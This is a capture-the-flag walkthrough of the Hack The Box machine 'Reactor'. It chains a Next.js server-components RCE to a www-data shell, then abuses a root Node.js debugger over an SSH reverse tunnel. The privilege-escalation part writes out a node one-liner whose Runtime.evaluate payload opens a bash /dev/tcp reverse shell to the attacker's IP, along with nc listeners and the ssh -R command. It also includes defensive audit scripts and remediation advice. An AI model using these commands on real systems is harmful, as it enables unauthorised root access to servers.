HTB Reactor: CVE-2025-55182 + Node.js Debug RCE
Introduction
Reactor is an Easy Linux machine centered around a Next.js web application. The attack chain combines a critical RCE vulnerability in React Server Components (CVE-2025-55182) for the initial foothold with a misconfigured Node.js debugging interface for privilege escalation to root.
Attack Overview
Nmap → Port 3000 (Next.js)
↓
CVE-2025-55182 → RCE via React Server Components payload
↓
Reverse shell as www-data
↓
Enumeration → Node.js debugger bound to 127.0.0.1:9229
↓
Port forwarding → Node Inspector
↓
Evaluate arbitrary JavaScript → spawn reverse shell as root
Reconnaissance
Nmap scan:
sudo nmap -sS -sV -sC 10.129.2.95
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.16
3000/tcp open ppp? [Next.js application]
Full port scan confirms only ports 22 and 3000. Add the hostname:
echo "10.129.2.95 reactor.htb" >> /etc/hosts
The web application at http://reactor.htb:3000 presents a ReactorWatch Core Monitoring System dashboard. Crawling with Katana reveals standard Next.js chunk structure but no additional endpoints.
Initial Access – CVE-2025-55182 (Next.js React Server Components RCE)
Vulnerability Overview
CVE-2025-55182 is a critical RCE vulnerability affecting Next.js versions that use React Server Components. The vulnerability allows an attacker to craft a malicious Server Action payload that bypasses input validation and leads to arbitrary code execution on the server.
Exploitation
A public proof-of-concept is used to generate a payload. Start a listener:
nc -lvnp 4444
Send the malicious request to the Next.js application. The payload executes a reverse shell as the www-data user.
whoami
# www-data
Upgrade to a proper TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Privilege Escalation – Node.js Debugger RCE
Enumeration
Running ss -tlnp reveals a Node.js debugger bound to 127.0.0.1:9229:
ss -tlnp
# LISTEN 127.0.0.1:9229
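A defender-side check for the finding above, added here as an example (not part of the original writeup): it parses the text output of ss -tlnp, flags listeners that look like a Node.js inspector, and reports the exposure. A loopback-only bind is still reported, because any local account able to open an SSH session elsewhere can publish the port with ssh -R, exactly as the next step does. The ss sample, pids and /proc cmdlines below are constructed; the port set and the /proc lookup are the only assumptions.

```python
"""Audit `ss -tlnp` output for Node.js inspector listeners (added example)."""
import re
import subprocess
from dataclasses import dataclass

# Default ports used by `node --inspect`; 9230 is the next free port a second
# inspected process (e.g. a worker) typically lands on. Assumption for the check.
INSPECTOR_PORTS = {9229, 9230}

SS_LINE = re.compile(
    r"^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+(?:\s+(?P<users>users:.*))?$"
)
PROC = re.compile(r'\("(?P<name>[^"]+)",pid=(?P<pid>\d+)')


@dataclass
class Listener:
    addr: str
    port: int
    process: str   # "" when ss could not show the owner (non-root, foreign pid)
    pid: int       # 0 when unknown


def parse_ss(output: str) -> list[Listener]:
    """Turn `ss -tlnp` lines into Listener records; header and non-LISTEN rows are skipped."""
    found = []
    for raw in output.splitlines():
        m = SS_LINE.match(raw.strip())
        if not m:
            continue
        p = PROC.search(m.group("users") or "")
        found.append(Listener(addr=m.group("addr"), port=int(m.group("port")),
                              process=p.group("name") if p else "",
                              pid=int(p.group("pid")) if p else 0))
    return found


def is_loopback(addr: str) -> bool:
    a = addr.strip("[]").split("%")[0]          # drop IPv6 brackets and %scope
    return a.startswith("127.") or a in ("::1", "localhost")


def find_inspectors(ss_output: str, cmdline_of=None) -> list[tuple[Listener, str]]:
    """Return (listener, reason) for every listener that looks like a Node inspector.

    cmdline_of(pid) -> list[str] optionally supplies /proc/<pid>/cmdline so that
    inspectors on non-default ports are caught when the owning process is node.
    """
    hits = []
    for l in parse_ss(ss_output):
        reason = None
        if l.port in INSPECTOR_PORTS:
            reason = f"default Node inspector port {l.port}"
        elif cmdline_of is not None and l.process in ("node", "nodejs") and l.pid:
            flag = next((a for a in cmdline_of(l.pid) if a.startswith("--inspect")), None)
            if flag:
                reason = f"node started with {flag}"
        if reason:
            hits.append((l, reason))
    return hits


def exposure(l: Listener) -> str:
    if is_loopback(l.addr):
        return "loopback only, but reachable by any local account via SSH port forwarding"
    return "reachable from the network"


def report(ss_output: str, cmdline_of=None) -> list[str]:
    return [f"{l.addr}:{l.port} pid={l.pid or '?'} ({l.process or 'unknown'}): {why}; {exposure(l)}"
            for l, why in find_inspectors(ss_output, cmdline_of)]


# Constructed sample modelled on the `ss -tlnp` output seen on the box.
SS_SAMPLE = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       4096    127.0.0.53%lo:53     0.0.0.0:*          users:(("systemd-resolve",pid=612,fd=14))
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=890,fd=3))
LISTEN  0       511     0.0.0.0:3000         0.0.0.0:*          users:(("next-server",pid=1402,fd=21))
LISTEN  0       511     127.0.0.1:9229       0.0.0.0:*          users:(("node",pid=1337,fd=18))
LISTEN  0       511     127.0.0.1:7777       0.0.0.0:*          users:(("node",pid=2001,fd=18))
LISTEN  0       128     [::]:22              [::]:*             users:(("sshd",pid=890,fd=4))
"""

# Constructed /proc/<pid>/cmdline contents for the sample pids.
SAMPLE_CMDLINES = {
    1337: ["node", "--inspect=127.0.0.1:9229", "server.js"],
    2001: ["node", "--inspect=127.0.0.1:7777", "worker.js"],
    1402: ["next-server"],
}


def proc_cmdline(pid: int) -> list[str]:
    """Live lookup of /proc/<pid>/cmdline (NUL separated); empty if unreadable."""
    try:
        with open(f"/proc/{pid}/cmdline", "rb") as f:
            return [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
    except OSError:
        return []


if __name__ == "__main__":
    try:
        live = subprocess.run(["ss", "-tlnp"], capture_output=True, text=True, check=False).stdout
    except OSError:
        live = ""
    lookup = proc_cmdline if live else (lambda pid: SAMPLE_CMDLINES.get(pid, []))
    for line in report(live or SS_SAMPLE, lookup):
        print(line)
```

Run as root on the host so ss can attribute every socket to its process; as an unprivileged user the cmdline check only covers processes you own, which is why the default-port match is kept as a fallback.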
The Node.js inspector protocol lets any client that can reach the port evaluate JavaScript inside the debugged process, which here runs as root. The port is bound to loopback only, so from the www-data shell open a reverse SSH tunnel that publishes it on the attacker machine:
# On target (www-data)
ssh -R 9229:127.0.0.1:9229 kali@10.10.14.237
On the attacker machine, connect to the Node.js debugger and evaluate JavaScript:
# Note: inspector.Session() attaches to the inspector of the process that runs the script itself, so a plain `new inspector.Session()` one-liner never talks to the forwarded port. A remote inspector is driven over the WebSocket endpoint it advertises at http://127.0.0.1:9229/json (Node 22+ provides fetch and WebSocket as globals):
node -e '
const expression = "require(\"child_process\").exec(\"bash -c \\\"bash -i >& /dev/tcp/10.10.14.237/5555 0>&1\\\"\")";
fetch("http://127.0.0.1:9229/json").then(r => r.json()).then(([session]) => {
  const ws = new WebSocket(session.webSocketDebuggerUrl);
  ws.onopen = () => ws.send(JSON.stringify({ id: 1, method: "Runtime.evaluate", params: { expression } }));
  ws.onmessage = (msg) => { console.log(msg.data); ws.close(); };
});'
Alternatively, use a tool like nodejs_eval.py. Start another listener:
nc -lvnp 5555
A reverse shell as root is received.
whoami
# root
Flags
User flag (found during enumeration):
[redacted]
Root flag:
[redacted]
Key Takeaways
| Vulnerability | Root Cause | Remediation |
|---|---|---|
| CVE-2025-55182 (Next.js RCE) | React Server Components input validation bypass | Upgrade Next.js to patched version; disable Server Actions if not needed |
| Node.js debugger exposed | --inspect bound to localhost but accessible via local port forwarding | Bind debugger to a Unix socket or disable in production; use --inspect=0.0.0.0:9229 only in development with proper firewall rules |
| SSH reverse port forwarding | www-data can create reverse SSH tunnels | Restrict SSH access for low-privileged users; use AllowTcpForwarding no |
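The last row of the table recommends AllowTcpForwarding no for low-privileged accounts. The following check, added here as an example and not part of the original writeup, parses the output of `sshd -T -C user=<name>,host=<h>,addr=<a>` (the effective configuration after Match blocks, keywords lower-cased) and reports which kinds of forwarding an account is still allowed. The two sample outputs and the user names are constructed; the keyword defaults are OpenSSH's. One scope caveat worth knowing: these keywords govern sessions into this host's sshd, while the tunnel in the writeup was an outbound ssh -R from the target to the attacker's box, which the target's sshd never sees, so egress filtering and denying service accounts an ssh client are the controls for that path.

```python
"""Report the effective sshd forwarding policy per user (added example)."""
import subprocess

# Defaults OpenSSH applies when a keyword is absent from `sshd -T` output.
DEFAULTS = {
    "allowtcpforwarding": "yes",
    "allowagentforwarding": "yes",
    "gatewayports": "no",
    "permittunnel": "no",
    "permitopen": "any",
    "permitlisten": "any",
}


def parse_sshd_t(output: str) -> dict[str, str]:
    """Parse `sshd -T` lines ("keyword value") into a dict; first occurrence wins, like sshd."""
    cfg: dict[str, str] = {}
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        cfg.setdefault(key.lower(), value.strip())
    return cfg


def forwarding_findings(user: str, cfg: dict[str, str]) -> list[str]:
    """One finding per forwarding capability the user keeps; empty list means fully restricted."""
    def get(k: str) -> str:
        return cfg.get(k, DEFAULTS[k])

    findings = []
    tcp = get("allowtcpforwarding")            # yes | no | local | remote
    if tcp in ("yes", "local"):
        findings.append(f"{user}: local (-L) forwarding allowed "
                        f"(allowtcpforwarding {tcp}, permitopen {get('permitopen')})")
    if tcp in ("yes", "remote"):
        findings.append(f"{user}: remote (-R) forwarding allowed "
                        f"(allowtcpforwarding {tcp}, permitlisten {get('permitlisten')})")
    if get("gatewayports") != "no":
        findings.append(f"{user}: gatewayports {get('gatewayports')} lets -R listeners bind non-loopback addresses")
    if get("allowagentforwarding") == "yes":
        findings.append(f"{user}: agent forwarding allowed")
    if get("permittunnel") != "no":
        findings.append(f"{user}: tun device forwarding allowed (permittunnel {get('permittunnel')})")
    return findings


def effective_config(user: str, host: str = "localhost", addr: str = "127.0.0.1") -> dict[str, str]:
    """Live query; sshd -T needs root because it reads the host keys."""
    out = subprocess.run(["sshd", "-T", "-C", f"user={user},host={host},addr={addr}"],
                         capture_output=True, text=True, check=True).stdout
    return parse_sshd_t(out)


# Constructed: what `sshd -T -C user=www-data,...` prints with a stock configuration.
SAMPLE_DEFAULT = """\
port 22
allowtcpforwarding yes
permitopen any
permitlisten any
gatewayports no
allowagentforwarding yes
permittunnel no
"""

# Constructed: the same query after adding to sshd_config
#   Match User www-data,nobody
#       AllowTcpForwarding no
#       AllowAgentForwarding no
#       PermitOpen none
#       PermitListen none
SAMPLE_HARDENED = """\
port 22
allowtcpforwarding no
permitopen none
permitlisten none
gatewayports no
allowagentforwarding no
permittunnel no
"""

if __name__ == "__main__":
    import sys
    for user in sys.argv[1:] or ["www-data"]:
        try:
            cfg = effective_config(user)
        except (OSError, subprocess.CalledProcessError):
            cfg = parse_sshd_t(SAMPLE_DEFAULT)   # no sshd / not root: use the constructed sample
        for line in forwarding_findings(user, cfg) or [f"{user}: no forwarding allowed"]:
            print(line)
```

Run it as root with the service accounts as arguments (python3 audit.py www-data nobody) and feed the findings into the Match block: AllowTcpForwarding no already removes both -L and -R, PermitOpen/PermitListen none are belt-and-braces for the local/remote variants if forwarding has to stay on for some accounts.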
Resources
- Nmap — Port scanning and service detection
- Katana — Web crawling and JS discovery
- CVE-2025-55182 PoC — Next.js React Server Components RCE
- Node.js Inspector — Debugging and code evaluation API
- ss — Socket statistics enumeration